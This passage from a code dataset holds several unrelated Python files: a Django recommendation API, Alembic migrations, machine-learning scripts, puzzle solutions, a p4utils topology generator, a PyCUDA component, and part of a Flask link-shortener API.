here.\n@api_view(['GET'])\ndef apiOverview(request):\n api_urls = {\n 'GET API Overview': 'api/v1/overview',\n 'GET Anime Recommendations': 'api/v1/anime/:id/recommendations'\n }\n return Response(api_urls)\n\n@api_view(['GET'])\ndef recommendAnimes(request, id):\n final_df = data[[col for col in data.columns if data[col].dtype != 'O']]\n final_df = pd.get_dummies(final_df)\n try:\n ind = recommend(final_df, model, id)\n recommendations = data.iloc[ind[1:]][['title_en', 'poster_image', 'description']].to_json(orient='index')\n except:\n return Response({\n 'success': False\n })\n return Response({\n 'success': True,\n 'anime': id,\n 'recommendations': json.loads(recommendations)\n })","sub_path":"recommendations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"429481668","text":"\"\"\"create text file for blog post\n\nRevision ID: db281c1a17e2\nRevises: b126fee9f5fb\nCreate Date: 2018-12-03 13:28:12.103625\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.orm import Session\nfrom app.models import Post\nimport string, re, os\n\n\n# revision identifiers, used by Alembic.\nrevision = 'db281c1a17e2'\ndown_revision = 'b126fee9f5fb'\nbranch_labels = None\ndepends_on = None\n\n\ndef createFolder(directory):\n try:\n if not os.path.exists(directory):\n os.makedirs(directory)\n except OSError:\n print ('Error: Creating directory. ' + directory)\n\n\ndef upgrade():\n conn = op.get_bind()\n session = Session(bind=conn)\n createFolder(\"blogstore\")\n\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('post', sa.Column('file', sa.String(), nullable=True))\n\n for item in session.query(Post):\n item.file = \"blogstore/\" + re.sub('['+string.punctuation+']', '', item.title).replace(' ', '-') + \".txt\"\n with open(item.file, \"a\") as fi:\n fi.write(item.body)\n\n session.commit()\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n    op.drop_column('post', 'file')\n    # ### end Alembic commands ###\n","sub_path":"migrations/versions/db281c1a17e2_create_text_file_for_blog_post.py","file_name":"db281c1a17e2_create_text_file_for_blog_post.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"534092175","text":"\"\"\"create user table\n\nRevision ID: 568731159647\nRevises: \nCreate Date: 2021-07-12 02:14:28.555245\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '568731159647'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    op.create_table(\n        'user',\n        sa.Column('id', sa.String(36), primary_key=True),\n        sa.Column('name', sa.String(255), nullable=False),\n        sa.Column('idp_id', sa.String(255), nullable=False),\n        sa.Column('email', sa.String(255), nullable=False),\n        sa.Column('icon', sa.String(255)),\n    )\n\n\ndef downgrade():\n    op.drop_table('user')\n","sub_path":"db/versions/568731159647_create_user_table.py","file_name":"568731159647_create_user_table.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"261160158","text":"# -*- coding:utf-8 -*-\n\nimport json\nimport xlwt\n\n\"\"\"Excel operations\"\"\"\n\ndef readFile2Dict(path):\n\tstr = ''\n\twith open(path,'r') as f:\n\t\tstr = f.read()\n\t\t# note: json.loads may change the original order of the dict\n\treturn json.loads(str)\n\n# save path + dict\ndef write2excel(savePath,d):\n\tf = xlwt.Workbook() # create a workbook\n\tsheet1 = f.add_sheet(u'sheet1',cell_overwrite_ok=True)\n\n\tfor x in d:\n\t\tsheet1.write(r=int(x) - 1,c=0,label=x)\n\t\tsheet1.write(r=int(x) - 1,c=1,label=d[x])\n\tf.save(savePath)\n\nd = readFile2Dict('/home/pingcai/pyProject/show-me-the-code/_0015/city.txt')\n\n\nwrite2excel('/home/pingcai/pyProject/show-me-the-code/_0015/city.xls',d)","sub_path":"_0015/_0015.py","file_name":"_0015.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"199350478","text":"# __author__ : slade\n# __time__ : 17/12/21\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.linear_model.logistic import LogisticRegression\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.ensemble import GradientBoostingClassifier\n\n# load data\nX_train = pd.read_csv('ensemble_X_train.csv').iloc[:, 1:]\nY_train = pd.read_csv('ensemble_Y_train.csv', header=None).iloc[:, 1:]\nX_test = pd.read_csv('ensemble_X_test.csv').iloc[:, 1:]\nY_test = pd.read_csv('ensemble_Y_test.csv', header=None).iloc[:, 1:]\nY_train = np.array(Y_train).ravel()\nY_test = np.array(Y_test).ravel()\n\n\n# define the evaluation metrics: res1 is the true positive rate, res2 is the overall accuracy\ndef metrics_spec(actual_data, predict_data, cutoff=0.5):\n    actual_data = np.array(actual_data)\n    predict_data = np.array(predict_data)\n    bind_data = np.c_[actual_data, predict_data]\n    res1 = 1.0 * (bind_data[bind_data[:, 0] == 1][:, 1] >= cutoff).sum() / bind_data[bind_data[:, 0] == 1].shape[0]\n    res2 = 1.0 * (\n        (bind_data[bind_data[:, 0] == 1][:, 1] >= cutoff).sum() + (\n            bind_data[bind_data[:, 0] == 0][:, 1] < cutoff).sum()) / \\\n           bind_data.shape[0]\n    return res1, res2\n\n\n# if you have read the article 'Kaggle-TianChi分类问题相关纯算法理论剖析', you may know the suggested tuning methods; let's follow them\n\n# get the baseline first\ngbm0 
= GradientBoostingClassifier(random_state=10)\ngbm0.fit(X_train, Y_train)\ny_predprob = gbm0.predict_proba(X_test)[:, 1]\nmetrics_spec(Y_test, y_predprob)\n\n# tune the n_estimators and learning_rate; since this is plain gbdt, only n_estimators here\n# if necessary, increasing the cv param can raise the confidence in the current model's result\nparam_test1 = {'n_estimators': [10, 50, 100, 300, 500]}\ngsearch1 = GridSearchCV(estimator=GradientBoostingClassifier(random_state=10),\n                        param_grid=param_test1, scoring='roc_auc', iid=False, cv=2)\ngsearch1.fit(X_train, Y_train)\nprint(gsearch1.best_params_)\n# {'n_estimators': 50}\n\n# get subsample next\nparam_test2 = {'subsample': [0.7, 0.8, 0.9, 1]}\ngsearch2 = GridSearchCV(estimator=GradientBoostingClassifier(n_estimators=50, random_state=10),\n                        param_grid=param_test2, scoring='roc_auc', iid=False, cv=2)\ngsearch2.fit(X_train, Y_train)\nprint(gsearch2.best_params_)\n# the first run shows {'subsample': 0.7}, so we need to reset the initial subsample range\n# param_test2 = {'subsample': [0.5, 0.6, 0.7]}\n# gsearch2 = GridSearchCV(estimator=GradientBoostingClassifier(n_estimators=50, random_state=10),\n#                         param_grid=param_test2, scoring='roc_auc', iid=False, cv=2)\n# gsearch2.fit(X_train, Y_train)\n# print(gsearch2.best_params_)\n# {'subsample': 0.6}\n\n# I have tuned max_leaf_nodes and min_weight_fraction_leaf privately but it didn't help, so we skip them. Get the min_samples_split and max_depth results directly\nparam_test3 = {'min_samples_split': [400, 900, 1300],\n               'max_depth': [3, 5, 7, 9]\n               }\ngsearch3 = GridSearchCV(\n    estimator=GradientBoostingClassifier(n_estimators=50, random_state=10, subsample=0.6),\n    param_grid=param_test3, scoring='roc_auc', iid=False, cv=2)\ngsearch3.fit(X_train, Y_train)\nprint(gsearch3.best_params_)\n# {'max_depth': 7, 'min_samples_split': 900}\n\n# for brevity, we skip tuning max_features as well as 'saddle-point escape' (鞍点逃逸) and 'limit exploration' (极限探索), but if you want to train a good model these steps should be added to your process\n# to be frank, it takes too much time\ngbm1 = GradientBoostingClassifier(n_estimators=50, random_state=10, subsample=0.6, max_depth=7,\n                                  min_samples_split=900)\ngbm1.fit(X_train, Y_train)\ny_predprob = gbm1.predict_proba(X_test)[:, 1]\nmetrics_spec(Y_test, y_predprob)\n\n# we can then get the sparse leaf-node encoding as the input for stacking\ntrain_new_feature = gbm1.apply(X_train)\ntest_new_feature = gbm1.apply(X_test)\ntrain_new_feature = train_new_feature.reshape(-1, 50)\ntest_new_feature = test_new_feature.reshape(-1, 50)\nenc = OneHotEncoder()\nenc.fit(train_new_feature)\ntrain_new_feature2 = np.array(enc.transform(train_new_feature).toarray())\ntest_new_feature2 = np.array(enc.transform(test_new_feature).toarray())\n\n# stack a model on top; it can be logistic regression, FM, or a neural network, and the result can exceed all expectations\n# caveats of the stacking model can be found in the article mentioned at the top of the code\nlr = LogisticRegression(C=1, penalty='l1', max_iter=100, solver='liblinear', multi_class='ovr')\nmodel_lr = lr.fit(train_new_feature2, Y_train)\ny_test_lr = model_lr.predict_proba(test_new_feature2)[:, 1]\nres2 = metrics_spec(Y_test, y_test_lr)\n","sub_path":"Ensemble/Stacking_gbdt_logistic_regression.py","file_name":"Stacking_gbdt_logistic_regression.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"383356125","text":"import statistics\nfrom functools import cache\n\nfrom parse import *\nfrom typing 
import Dict\n\n\ndef main():\n    crabs = []\n    with open('inputs/07.txt') as input_file:\n        temp_crabs = input_file.read().strip().split(',')\n        crabs = [int(i) for i in temp_crabs]\n    med = statistics.median(crabs)\n    print(statistics.mean(crabs))\n    fuel = 0\n    for c in crabs:\n        fuel += abs(med-c)\n    return fuel\n\n\ndef main_2():\n    crabs = []\n    with open('inputs/07.txt') as input_file:\n        temp_crabs = input_file.read().strip().split(',')\n        crabs = [int(i) for i in temp_crabs]\n    c_max = max(crabs)\n    c_min = min(crabs)\n    min_fuel = None\n    min_pos = -1\n    for i in range(c_min, c_max+1):\n        curr_fuel = 0\n        for c_pos in crabs:\n            curr_fuel += fuel_cost(c_pos, i)\n        if min_fuel is None:\n            min_fuel = curr_fuel\n            min_pos = i\n        elif curr_fuel < min_fuel:\n            min_fuel = curr_fuel\n            min_pos = i\n    return min_pos, min_fuel\n\n\n@cache\ndef fuel_cost(c_pos, final_pos):\n    return sum(range(0, abs(c_pos - final_pos) + 1))\n\n\nif __name__ == '__main__':\n    result = main_2()\n    print(result)","sub_path":"2021/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"75459973","text":"import argparse\nimport networkx\n\ndef init_python(f):\n    \n    f.write('from p4utils.mininetlib.network_API import NetworkAPI\\n')\n    f.write('\\n')\n    f.write('# Network general options\\n')\n    f.write('net = NetworkAPI()\\n')\n    f.write('net.setLogLevel(\"info\")\\n')\n\ndef end_python(f):\n\n    f.write('\\n')\n    f.write('# Assignment strategy\\n')\n    f.write('net.l3()\\n')\n    f.write('\\n')\n    f.write('# Nodes general options\\n')\n    f.write('net.enableCpuPortAll()\\n')\n    f.write('net.disablePcapDumpAll()\\n')\n    f.write('net.enableLogAll()\\n')\n    f.write('net.enableCli()\\n')\n    f.write('net.startNetwork()\\n')\n\ndef create_linear_topo(f, num_switches):\n    \n    f.write('\\n')\n    f.write('# Network definition\\n')\n\n    # Add switches\n    for i in range(1, num_switches+1):\n        f.write('net.addP4Switch(\"s{}\")\\n'.format(i))\n    \n    f.write('net.setP4SourceAll(\"p4src/fast_reroute.p4\")\\n')\n    f.write('\\n')\n\n    # Add hosts\n    for i in range(1, num_switches+1):\n        f.write('net.addHost(\"h{}\")\\n'.format(i))\n\n    f.write('\\n')\n\n    # Connect hosts with switches\n    for i in range(1, num_switches+1):\n        f.write('net.addLink(\"h{}\", \"s{}\")\\n'.format(i, i))\n\n    # Connect switches\n    for i in range(1, num_switches):\n        f.write('net.addLink(\"s{}\", \"s{}\")\\n'.format(i, i+1))\n\ndef create_circular_topo(f, num_switches):\n\n    # reuse the linear topology, passing the output file handle through\n    create_linear_topo(f, num_switches)\n    # Add link between s1 and sN\n    f.write('net.addLink(\"s{}\", \"s{}\")\\n'.format(1, num_switches))\n\ndef create_random_topo(f, degree=4, num_switches=10):\n\n    f.write('\\n')\n    f.write('# Network definition\\n')\n\n    g = networkx.random_regular_graph(degree, num_switches)\n    trials = 0\n    while not networkx.is_connected(g):\n        g = networkx.random_regular_graph(degree, num_switches)\n        trials +=1\n        if trials >= 10:\n            print(\"Could not create a connected graph\")\n            return\n\n    # Add switches\n    for i in range(1, num_switches+1):\n        f.write('net.addP4Switch(\"s{}\")\\n'.format(i))\n    \n    f.write('net.setP4SourceAll(\"p4src/fast_reroute.p4\")\\n')\n    f.write('\\n')\n\n    # Add hosts\n    for i in range(1, num_switches+1):\n        f.write('net.addHost(\"h{}\")\\n'.format(i))\n\n    f.write('\\n')\n\n    # Connect hosts with switches\n    for i in range(1, num_switches + 1):\n        f.write('net.addLink(\"h{}\",\"s{}\")\\n'.format(i, i))\n\n    # Connect switches\n    for edge in g.edges:\n        f.write('net.addLink(\"s{}\",\"s{}\")\\n'.format(edge[0]+1, 
edge[1]+1))\n\n\ndef main():\n    pass\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--output_name', type=str, required=False, default=\"network_test.py\")\n    parser.add_argument(\"--topo\", type=str, default=\"linear\")\n    parser.add_argument('-n', type=str, required=False, default=2)\n    parser.add_argument('-d', type=str, required=False, default=4)\n    args = parser.parse_args()\n\n    with open(args.output_name, 'w') as f:\n        init_python(f)\n        if args.topo == \"linear\":\n            create_linear_topo(f, int(args.n))\n        elif args.topo == \"circular\":\n            create_circular_topo(f, int(args.n))\n        elif args.topo == \"random\":\n            create_random_topo(f, int(args.d), int(args.n))\n        end_python(f)\n","sub_path":"07-Fast-Reroute/solution/network_generator.py","file_name":"network_generator.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"23884825","text":"# First, convert the json into index\\tsentence form\n# Deduplicate: a sentence-level filter\n# Remove junk text (specific and general): a word/phrase-level filter\n# Remove unrelated text\n# Then reshape everything into the dataloader format\n\nimport os\nimport json\nimport sys\nimport random\nfrom tkinter import *\nimport pandas as pd\nimport numpy as np\nimport re\n\nimport os\nimport time\nimport argparse\n\nfrom filter_copy import *\nimport predict\nimport compose_new\n \n# In theory you only need to change topic_name (the topic)\n# and the model file given to load-model\n\ntopic_name = \"NBA\"\nraw_topic_dir = os.path.join(\"./raw_data\",topic_name)\ntopic_dir = os.path.join(\"./data\",topic_name)\npreprocessed_topic_dir = os.path.join(\"./preprocessed_data\",topic_name) \nresult_topic_dir = os.path.join(\"./result\",topic_name)\nnew_topic_dir = os.path.join(\"./new_data\",topic_name)\n\n# in fact optional; used to inspect the test results\ncheck_topic_dir = os.path.join(\"./check_data\",topic_name)\n\nif not os.path.exists(topic_dir):\n    os.mkdir(topic_dir)\nif not os.path.exists(preprocessed_topic_dir):\n    os.mkdir(preprocessed_topic_dir)\nif not os.path.exists(result_topic_dir):\n    os.mkdir(result_topic_dir)\nif not os.path.exists(new_topic_dir):\n    os.mkdir(new_topic_dir)\n\nif not os.path.exists(check_topic_dir):\n    os.mkdir(check_topic_dir)\n\npre_parser = argparse.ArgumentParser(description=\"preprocess data with bert embedding.\")\npre_parser.add_argument('--input-dir', type=str, default=topic_dir)\npre_parser.add_argument('--output-dir', type=str, default=preprocessed_topic_dir)\npre_args = pre_parser.parse_args()\n\n\nparser = argparse.ArgumentParser(description='predict process')\nparser.add_argument('--input-train', type=str, default=\"preprocessed_data/train.json\")\nparser.add_argument('--input-dev', type=str, default=\"preprocessed_data/dev.json\")\nparser.add_argument('--input-test', type=str, default=\"preprocessed_data/2019-09-03-2.json\")\n\nparser.add_argument('--bert-model', type=str, default=\"bert-base-chinese\",\n                    help=\"Bert pre-trained model selected in the list: bert-base-uncased, \"\n                         \"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \"\n                         \"bert-base-multilingual-cased, bert-base-chinese.\"\n                    )\nparser.add_argument('--epochs', type=int, default=6)\nparser.add_argument('--lr', '--learning-rate', default=5e-5, type=float)\nparser.add_argument('--warmup-proportion', type=float, default=0.1)\nparser.add_argument('--batch-size', type=int, default=16)\nparser.add_argument('--dropout-prob', type=float, default=0.1)\nparser.add_argument('--weight', type=float, default=1.0)\nparser.add_argument('--max-len', type=int, default=80)\n\nparser.add_argument('--save-dir', type=str, 
default='saved_model/'+topic_name)\nparser.add_argument('--test-result',type=str, default=result_topic_dir)\nparser.add_argument('--input-dir',type=str, default=preprocessed_topic_dir)\nparser.add_argument('--use-cpu', type=bool, default=False)\nparser.add_argument('--gpu-devices', type=str, default=\"5\")\nparser.add_argument('--seed', type=int, default=42)\n\nparser.add_argument(\"--resume\", type=bool, default=True)\nparser.add_argument(\"--load-model\", type=str, default=\"saved_model/NBA/ckpt-epoch-10\")\n\nargs = parser.parse_args()\n\ndef main():\n\n    print(\"Begin removing duplicated samples and rubbish words...\")\n    #filter = Filter(raw_topic_dir,topic_dir)\n    #filter.do_filter()\n    print(\"Done\\n\")\n    print(\"Begin picking out useless samples.\\n Firstly, preprocess the data with bert embedding...\")\n    tokenizer = BertTokenizer.from_pretrained(\"bert-base-chinese\")\n    processor = Preprocess(pre_args, tokenizer)\n    processor.do_preprocess()\n    print(\"Done\\n\")\n    print(\"Secondly, use the trained model to predict...\")\n    predict.predict(args)\n    print(\"Done\\n\")\n    print(\"Thirdly, recompose new samples...\")\n    compose_new.create_new(topic_dir,result_topic_dir,new_topic_dir,check_topic_dir)\n    print(\"Done\\n\")\nif __name__ == \"__main__\":\n    main()","sub_path":"preprocess/neu_weibo/preprocess_test/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"185653249","text":"# 977. Squares of a Sorted Array\n\n# Given an array of integers A sorted in non-decreasing order, return an array of the squares of\n# each number, also in sorted non-decreasing order.\n\n# Example 1:\n\n# Input: [-4,-1,0,3,10]\n# Output: [0,1,9,16,100]\n# Example 2:\n\n# Input: [-7,-3,2,3,11]\n# Output: [4,9,9,49,121]\n\n# Complexity:\n# Time: O(N)\n# Space: O(N)\n# Where:\n# N is the length of the input array\n\nfrom typing import List\n\nclass Solution:\n    def sortedSquares(self, A: List[int]) -> List[int]:\n        neg, res = [], []\n        for n in A:\n            square = n * n\n            if n < 0:\n                neg.append(square)\n            else:\n                while len(neg) > 0 and square > neg[-1]:\n                    res.append(neg.pop())\n                res.append(square)\n        while len(neg) > 0:\n            res.append(neg.pop())\n        return res\n","sub_path":"leetcode/977. Squares of a Sorted Array.py","file_name":"977. 
Squares of a Sorted Array.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"417481257","text":"\nimport numpy as np\nimport pycuda.gpuarray as garray\nfrom pycuda.tools import dtype_to_ctype\nimport pycuda.driver as cuda\nfrom pycuda.compiler import SourceModule\n\nfrom neurokernel.LPU.NDComponents.MembraneModels.BaseMembraneModel import BaseMembraneModel\n\nclass BufferVoltage(BaseMembraneModel):\n updates = ['V']\n accesses = ['V']\n def __init__(self, params_dict, access_buffers, dt, LPU_id=None,\n debug=False, cuda_verbose=False):\n if cuda_verbose:\n self.compile_options = ['--ptxas-options=-v']\n else:\n self.compile_options = []\n\n self.dt = np.double(dt)\n self.debug = debug\n self.dtype = np.double\n\n self.LPU_id = LPU_id\n\n self.params_dict = params_dict\n\n self.num_neurons = params_dict['pre']['V'].size\n self.access_buffers = access_buffers\n self.update = get_re_sort_func(self.dtype, self.compile_options)\n\n self.block_re_sort = (256, 1, 1)\n self.grid_re_sort = (cuda.Context.get_device().MULTIPROCESSOR_COUNT*5, 1)\n\n @property\n def maximum_dt_allowed(self):\n return 1.\n\n def run_step(self, update_pointers, st=None):\n self.update.prepared_async_call(\n self.grid_re_sort, self.block_re_sort, st,\n self.access_buffers['V'].gpudata,\n update_pointers['V'],\n self.params_dict['pre']['V'].gpudata,\n self.params_dict['npre']['V'].gpudata,\n self.params_dict['cumpre']['V'].gpudata,\n self.num_neurons)\n\ndef get_re_sort_func(dtype, compile_options):\n template = \"\"\"\n\n__global__ void\nresort(%(type)s* in_v, %(type)s* out_v, int* pre, int* npre,\n int* cumpre, int num_neurons)\n{\n int tid = threadIdx.x + blockIdx.x * blockDim.x;\n int total_threads = blockDim.x * gridDim.x;\n\n for(int i = tid; i < num_neurons; i += total_threads)\n {\n if(npre[i])\n out_v[i] = in_v[pre[cumpre[i]]];\n }\n}\n\"\"\"\n mod = SourceModule(template % {\"type\": dtype_to_ctype(dtype)},\n options = compile_options)\n func = mod.get_function('resort')\n func.prepare('PPPPPi')\n return func\n","sub_path":"retina/NDComponents/MembraneModels/BufferVoltage.py","file_name":"BufferVoltage.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"234014717","text":"#\r\n#MIT License\r\n#\r\n#Copyright (c) 2022 John Damilola, Leo Hsiang, Swarangi Gaurkar, Kritika Javali, Aaron Dias Barreto\r\n#\r\n#Permission is hereby granted, free of charge, to any person obtaining a copy\r\n#of this software and associated documentation files (the \"Software\"), to deal\r\n#in the Software without restriction, including without limitation the rights\r\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n#copies of the Software, and to permit persons to whom the Software is\r\n#furnished to do so, subject to the following conditions:\r\n#\r\n#The above copyright notice and this permission notice shall be included in all\r\n#copies or substantial portions of the Software.\r\n#\r\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\r\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n#SOFTWARE.\r\n\r\n\r\n\r\nfrom operator import and_\r\nfrom flask import Blueprint, jsonify #import dependancies\r\nfrom flask_cors import cross_origin\r\nfrom string import ascii_letters, digits\r\nfrom flask import request\r\nfrom random import choice\r\ntry:\r\n from ..models.links import Link, db, load_link\r\n from ..models.links_anonymous import AnonymousLink\r\n from ..models.user import User, login_required2\r\n from ..models.engagements import Engagements\r\nexcept ImportError:\r\n from models.links import Link, db, load_link\r\n from models.links_anonymous import AnonymousLink\r\n from models.user import User, login_required2\r\n from models.engagements import Engagements\r\n\r\nlinks_bp = Blueprint(\r\n 'links_bp', __name__\r\n)\r\n\r\n@links_bp.route('/links/', methods = ['GET'])\r\n@cross_origin(supports_credentials=True)\r\ndef getlink(id):\r\n '''This method is called when we want to fetch a single link, we pass link_id'''\r\n try:\r\n link = Link.query.get(id)\r\n return jsonify(\r\n link = link.to_json(),\r\n message = 'Fetched link successfully',\r\n status = 200\r\n ), 200\r\n except Exception as e:\r\n return jsonify(\r\n message = f\"An error occurred: {e}\",\r\n status = 400\r\n ), 400\r\n \r\n@links_bp.route('/links/stub/', methods = ['GET'])\r\n@cross_origin(supports_credentials=True)\r\ndef get_link_by_stub(stub):\r\n '''This method is called when we want to fetch a single link using the stub'''\r\n try:\r\n link = db.session.query(Link).filter(Link.stub==stub).first()\r\n return jsonify(\r\n link = link.to_json(),\r\n message = 'Fetched link successfully',\r\n status = 200\r\n ), 200\r\n except Exception as e:\r\n return jsonify(\r\n message = f\"An error occurred: {e}\",\r\n status = 400\r\n ), 400\r\n \r\n@links_bp.route('/links_anonymous/stub/', methods = ['GET'])\r\n@cross_origin(supports_credentials=True)\r\ndef get_anonymous_link_by_stub(stub):\r\n '''This method is called when we want to fetch a single link anonymously using the stub'''\r\n try:\r\n link = db.session.query(AnonymousLink).filter(AnonymousLink.stub==stub).first()\r\n return jsonify(\r\n link = link.to_json(),\r\n message = 'Fetched link successfully',\r\n status = 200\r\n ), 200\r\n except Exception as e:\r\n return jsonify(\r\n message = f\"An error occurred: {e}\",\r\n status = 400\r\n ), 400\r\n\r\n@links_bp.route('/links/all', methods = ['GET'])\r\n@login_required2()\r\n@cross_origin(supports_credentials=True)\r\ndef getalllinks():\r\n '''This method is called when we want to fetch all of the links of a particular user. 
Here, we check if the user is authenticated, \r\n if yes show all the links made by the user.'''\r\n args = request.args\r\n user_id = args and args['user_id']\r\n try:\r\n links = db.session.query(Link).join(User).filter(User.id==user_id).all() \r\n _links = []\r\n for item in links:\r\n _links.append(item.to_json())\r\n return jsonify(\r\n links = _links,\r\n message = 'Fetching links successfully',\r\n status = 200\r\n ), 200\r\n except Exception as e:\r\n return jsonify(\r\n message = f\"An error occurred {e}\",\r\n status = 400\r\n ), 400\r\n\r\ndef create_shortlink():\r\n CHARS = ascii_letters + digits\r\n stub = \"\".join(choice(CHARS) for _ in range(12))\r\n \r\n return stub\r\n\r\n\r\n@links_bp.route('/links/create', methods = ['POST'])\r\n@login_required2()\r\n@cross_origin(supports_credentials=True)\r\ndef create():\r\n '''This method is routed when the user requests to create a new link.'''\r\n args = request.args\r\n user_id = args and args['user_id']\r\n try:\r\n data = request.get_json()\r\n long_url=data['long_url']\r\n if data.get('stub'):\r\n stub=data.get('stub')\r\n else:\r\n stub=create_shortlink()\r\n title=data.get('title')\r\n disabled=data.get('disabled')\r\n utm_source=data.get('utm_source')\r\n utm_medium=data.get('utm_medium')\r\n utm_campaign=data.get('utm_campaign')\r\n utm_term=data.get('utm_term')\r\n utm_content=data.get('utm_content')\r\n password_hash=data.get('password_hash') \r\n expire_on=data.get('expire_on')\r\n\r\n link = Link(user_id=user_id, stub=stub, long_url=long_url, title=title, disabled=disabled, utm_source=utm_source, utm_medium=utm_medium,utm_campaign=utm_campaign, utm_term=utm_term, utm_content=utm_content, password_hash=password_hash, expire_on=expire_on)\r\n link.user_id = user_id\r\n db.session.add(link)\r\n db.session.commit()\r\n\r\n return jsonify(\r\n link = link.to_json(),\r\n message = 'Create Link Successful',\r\n status = 201\r\n ), 201\r\n except Exception as e:\r\n return jsonify(\r\n message = f'Create Link Failed {e}',\r\n status = 400\r\n ), 400\r\n \r\n@links_bp.route('/links/create_anonymous', methods = ['POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef create_anonymous():\r\n '''This method is routed when the user requests to create a new link anonymously.'''\r\n try:\r\n data = request.get_json()\r\n long_url=data['long_url']\r\n stub=create_shortlink()\r\n\r\n link = AnonymousLink(stub=stub, long_url=long_url)\r\n db.session.add(link)\r\n db.session.commit()\r\n\r\n return jsonify(\r\n link = link.to_json(),\r\n message = 'Create Link Successful',\r\n status = 201\r\n ), 201\r\n except Exception as e:\r\n return jsonify(\r\n message = f'Create Link Failed {e}',\r\n status = 400\r\n ), 400\r\n\r\n@links_bp.route('/links/update/', methods = ['PATCH'])\r\n@login_required2()\r\n@cross_origin(supports_credentials=True)\r\ndef update(id):\r\n '''This method is called when the user requests to update the link.'''\r\n try:\r\n request_data = request.get_json()\r\n data = {k: v for k, v in request_data.items() if v is not None}\r\n long_url=data['long_url']\r\n stub=data.get('stub')\r\n title=data.get('title')\r\n disabled=data.get('disabled')\r\n utm_source=data.get('utm_source')\r\n utm_medium=data.get('utm_medium')\r\n utm_campaign=data.get('utm_campaign')\r\n utm_term=data.get('utm_term')\r\n utm_content=data.get('utm_content')\r\n password_hash=data.get('password_hash') \r\n expire_on=data.get('expire_on')\r\n\r\n link = load_link(id)\r\n if 'stub' in data:\r\n link.stub=stub\r\n if 'long_url' in data:\r\n 
link.long_url=long_url \r\n if 'title' in data:\r\n link.title=title\r\n if 'disabled' in data:\r\n link.disabled=disabled\r\n if 'utm_source' in data:\r\n link.utm_source=utm_source\r\n if 'utm_medium' in data:\r\n link.utm_medium=utm_medium\r\n if 'utm_campaign' in data:\r\n link.utm_campaign=utm_campaign\r\n if 'utm_content' in data:\r\n link.utm_content=utm_content\r\n if 'utm_term' in data:\r\n link.utm_term=utm_term\r\n if 'password_hash' in data:\r\n link.password_hash=password_hash\r\n if 'expire_on' in data:\r\n link.expire_on=expire_on\r\n # db.session.query(Link).filter_by(id=id).update(stub=stub,long_url=long_url, title=title, disabled=disabled, utm_source=utm_source, utm_medium=utm_medium, utm_campaign=utm_campaign, utm_content=utm_content, utm_term=utm_term, password_hash=password_hash, expire_on=expire_on)\r\n # db.session.update()\r\n db.session.commit()\r\n\r\n return jsonify(\r\n link = link.to_json(),\r\n message = 'Update Link Successful',\r\n status = 201\r\n ), 201\r\n except Exception as e:\r\n return jsonify(\r\n message = f'Update Link Failed {e}',\r\n status = 400\r\n ), 400\r\n\r\n@links_bp.route('/links/delete/', methods = ['DELETE'])\r\n@login_required2()\r\n@cross_origin(supports_credentials=True)\r\ndef delete(id):\r\n '''This method is called when the user requests to delete the link. Only the link id is required to delete the deck.'''\r\n try:\r\n db.session.query(Link).filter_by(id=id).delete()\r\n db.session.commit()\r\n return jsonify(\r\n message = 'Delete link Successful',\r\n status = 200\r\n ), 200\r\n except Exception as e:\r\n return jsonify(\r\n message = f'Delete link Failed {e}',\r\n status = 400\r\n ), 400\r\n \r\n \r\n@links_bp.route('/links/stats', methods = ['GET'])\r\n@login_required2()\r\n@cross_origin(supports_credentials=True)\r\ndef get_link_stats():\r\n '''This method is called when we want to fetch the stats of all the links of a particular user. 
